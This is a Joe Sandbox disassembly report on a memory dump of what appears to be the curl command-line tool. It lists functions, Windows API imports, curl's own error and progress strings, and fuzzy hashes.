curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
out of memory, xrefs: 00007FF7F8D07D12
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdupmalloc
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
API String ID: 3583953570-1742031202
Opcode ID: 5e52dbf63b134f8823531d00eb8c7ac55b0c68d4c22cf3ac356fc03a923e365f
Instruction ID: 279b3d89a3eb062f7a71e42d536c7e5ac4ee45a44cda3bf502486138d65696dd
Opcode Fuzzy Hash: 5e52dbf63b134f8823531d00eb8c7ac55b0c68d4c22cf3ac356fc03a923e365f
Instruction Fuzzy Hash: 0DC1B032A0DB8285EB10EB61D44057DE7A5FF88784F940135DA7E476D8DF3CE448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07D82 Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07DAE
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E59
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E62
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E82
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07EA1

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdupmalloc
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
API String ID: 3583953570-1623358720
Opcode ID: ba2ea338faca8cddeaa40029e77d8c1ff43fcdf1dcf16e1c52ee47e46ddd4e88
Instruction ID: 01cbb96b3ca1926e2b02e903148c00f56921284c38914820df427321e845b96c
Opcode Fuzzy Hash: ba2ea338faca8cddeaa40029e77d8c1ff43fcdf1dcf16e1c52ee47e46ddd4e88
Instruction Fuzzy Hash: ABB1B032A0EB8285EB10EB61D44417DE7A5FF88B50F940135DA7E476D8DF3CE448A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07D2D Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07D30
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E59
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E62
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E82
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07EA1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B05D

Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B268
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B280
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B28E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B29C

Part of subcall function 00007FF7F8D0DBBC: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D0B27C), ref: 00007FF7F8D0DC00
Part of subcall function 00007FF7F8D0DBBC: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D0B27C), ref: 00007FF7F8D0DC17
Part of subcall function 00007FF7F8D0DBBC: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D0B27C), ref: 00007FF7F8D0DC38

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
out of memory, xrefs: 00007FF7F8D07D45
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$__acrt_iob_func_fileno_strdup$fputs
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
API String ID: 2510645739-1742031202
Opcode ID: e7aed5bf29db21c16b5f8518bc82aa38068e4691342c9d849a01dcaef7e55d92
Instruction ID: f2062cb3da8f33002533163c24001680ddcfd38906aec7d4341f37d4d5d03d50
Opcode Fuzzy Hash: e7aed5bf29db21c16b5f8518bc82aa38068e4691342c9d849a01dcaef7e55d92
Instruction Fuzzy Hash: ABA1B022A0EB8285FB10EB61D44417DE7A5FF88740F940035DA7E476D8DF3CE449A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07D8C Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07DAE
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E59
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E62
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E82
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07EA1

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdupmalloc
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
API String ID: 3583953570-1623358720
Opcode ID: 3fbf2932f5f5a3209dac7f6ac3747fd6eb6271705fb56e57858a7746f1c2f977
Instruction ID: 4020d0760d05c64871759c46adb019fec2178f8803dd5593a13732d1b116ec29
Opcode Fuzzy Hash: 3fbf2932f5f5a3209dac7f6ac3747fd6eb6271705fb56e57858a7746f1c2f977
Instruction Fuzzy Hash: 5DB1B032A0EB8285EB10EB61D45017DE7A5FF88B50F940135DA7E476D8DF3CE448A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2E068 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 119
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E091
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0AD
_mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0C0
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0E4
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0FB
LoadLibraryExA.KERNELBASE(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E11A
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E128
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E162
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E172
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E1CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E1EB

Strings

AddDllDirectory, xrefs: 00007FF7F8D2E0F1
LoadLibraryExA, xrefs: 00007FF7F8D2E0A3
kernel32, xrefs: 00007FF7F8D2E08A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 184734234-3327535076
Opcode ID: 238863f9c11f4d697a297311e24e5cdc573fe8f7ed692150ed0727168830531e
Instruction ID: c92b1a4142f4ca717167d01bb43a5c0e524b50ff8dffecf25479d2576e49ae88
Opcode Fuzzy Hash: 238863f9c11f4d697a297311e24e5cdc573fe8f7ed692150ed0727168830531e
Instruction Fuzzy Hash: 93417921A0D68685EB59EB22B814139E791BF9DFC0F8C4174CD2E073D1DE3CE409A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0ED58 Relevance: 14.7, APIs: 2, Strings: 6, Instructions: 714COMMONLIBRARYCODE

Download Yara Rule

Strings

.%ld, xrefs: 00007FF7F8D0F0A5
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FF7F8D0ED9E, 00007FF7F8D0F267, 00007FF7F8D0F3C1
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00007FF7F8D0F26E, 00007FF7F8D0F3CE
%ld, xrefs: 00007FF7F8D0F04A
(nil), xrefs: 00007FF7F8D0F5A5
(nil), xrefs: 00007FF7F8D0F646

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: %ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-1379995092
Opcode ID: a63955e5a12cdd3e0126b501c1c72bbbb60ea4a13fa9e2048efdabacb0c32b14
Instruction ID: 912c487937dd46b35ab6e35fabdf67bb8589d09181616961706ee06af0f08eef
Opcode Fuzzy Hash: a63955e5a12cdd3e0126b501c1c72bbbb60ea4a13fa9e2048efdabacb0c32b14
Instruction Fuzzy Hash: 19524C26E1CA4242F7616F25A404379EA50BF88764FE44630DD7E177D9DE3CE80CA7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D14556 Relevance: 12.7, APIs: 1, Strings: 7, Instructions: 657COMMON

Download Yara Rule

Strings

Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received, xrefs: 00007FF7F8D146A8
&s, xrefs: 00007FF7F8D152E1
Hostname '%s' was found in DNS cache, xrefs: 00007FF7F8D14A81
In state %d with no easy_conn, bail out!, xrefs: 00007FF7F8D155AB
Operation timed out after %ld milliseconds with %I64d bytes received, xrefs: 00007FF7F8D146ED
Connection timed out after %ld milliseconds, xrefs: 00007FF7F8D14633
Resolving timed out after %ld milliseconds, xrefs: 00007FF7F8D1460A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: Connection timed out after %ld milliseconds$Hostname '%s' was found in DNS cache$In state %d with no easy_conn, bail out!$Operation timed out after %ld milliseconds with %I64d bytes received$Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received$Resolving timed out after %ld milliseconds$&s
API String ID: 0-2609473459
Opcode ID: 20ea6fa6f968dcaa173715c21156d3a3e88ed29723636ce97237f862197dfdd7
Instruction ID: c1525bd4293d6adf59c85d236b4bf413026ed1c5517920fa8747db7f382dd43d
Opcode Fuzzy Hash: 20ea6fa6f968dcaa173715c21156d3a3e88ed29723636ce97237f862197dfdd7
Instruction Fuzzy Hash: 9D421921B08A4245FB54EB7594102BDE793AF89BB4F854231CE3E177C5DE3DE409A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D289F8 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D23BB8: GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16245), ref: 00007FF7F8D23BC1

fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D29040

Strings

Callback aborted, xrefs: 00007FF7F8D28CB6
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00007FF7F8D28D62
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00007FF7F8D28FDF
** Resuming transfer from byte position %I64d, xrefs: 00007FF7F8D28D4F

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: Count64Tickfflush
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d$Callback aborted
API String ID: 543934441-3594599953
Opcode ID: 1e27237f41beead48ce701369ae8707ef1765d4ffb82ba298e4e36d1f8a1ce51
Instruction ID: 1b9d9d9a9e73d195449c2c95e117f795ebd30135c60061be5a4424a1532a15ac
Opcode Fuzzy Hash: 1e27237f41beead48ce701369ae8707ef1765d4ffb82ba298e4e36d1f8a1ce51
Instruction Fuzzy Hash: 52024522B09B9985EB40EB29D9446F9F3A8FF48780F854232EE5D57791DF38D805D384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D16A00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00007FF7F8D3FAAF), ref: 00007FF7F8D16AC1
recv.WS2_32 ref: 00007FF7F8D16AEF
send.WS2_32 ref: 00007FF7F8D16B0C
WSAGetLastError.WS2_32(?,?,?,?,?,?,00007FF7F8D3FAAF), ref: 00007FF7F8D16B23

Strings

Send failure: %s, xrefs: 00007FF7F8D16B49

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLastmallocrecvsend
String ID: Send failure: %s
API String ID: 25851408-857917747
Opcode ID: e327cf3e2ad2a4187f8e9f2ff8b47702faa42ba3688412cbcffc64dc90a3d702
Instruction ID: 3c294fec3774d5a1bf4c5ca7bf9714c8957253da640b98ab39bbee45035b97ea
Opcode Fuzzy Hash: e327cf3e2ad2a4187f8e9f2ff8b47702faa42ba3688412cbcffc64dc90a3d702
Instruction Fuzzy Hash: CF415A32B09A4282EB20AF66B594369E7A0EF58BA4F484135CF6D437D0DF3CE448D354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D140B4 Relevance: 2.7, APIs: 2, Instructions: 165COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D141B2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 88ca84d53e1e42bfa1f557bf158eb17b77a14940c471f8631920d4f2befa50f2
Instruction ID: fd130911c07027e0a9c285550c7a8ed3438df7e48966b81c65a9fdcdba5d3ac4
Opcode Fuzzy Hash: 88ca84d53e1e42bfa1f557bf158eb17b77a14940c471f8631920d4f2befa50f2
Instruction Fuzzy Hash: 5951F922A08E8241FB65EB7594106BDE2A7BF5CBB4F880231DE7D476C4DE3CD4889394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D48630 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF7F8D48639

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d3a4e07e4c82b14e0a6a19c3fdcb85619191a5628faf5663cd4696f8ac2aaea8
Instruction ID: ba9349f0f787ecd69ef22fb3ba7dabd3429f0fad6a298f8077e902176d159761
Opcode Fuzzy Hash: d3a4e07e4c82b14e0a6a19c3fdcb85619191a5628faf5663cd4696f8ac2aaea8
Instruction Fuzzy Hash: 2CC04851F4E847C9E70837E258920B8C1A16F6C340FA814B2E02D016D28D5D209E3BBA

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0C0E4 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 379
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D0C18B
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C19C
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C1AA
GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D0C1BC
__swprintf_l.LIBCMT ref: 00007FF7F8D0C213
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C220
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C23F
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C251
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C294
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C2D6
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C304
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C33F
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C3AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C3CB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C49D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C5BF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C5C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C5EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C5F4
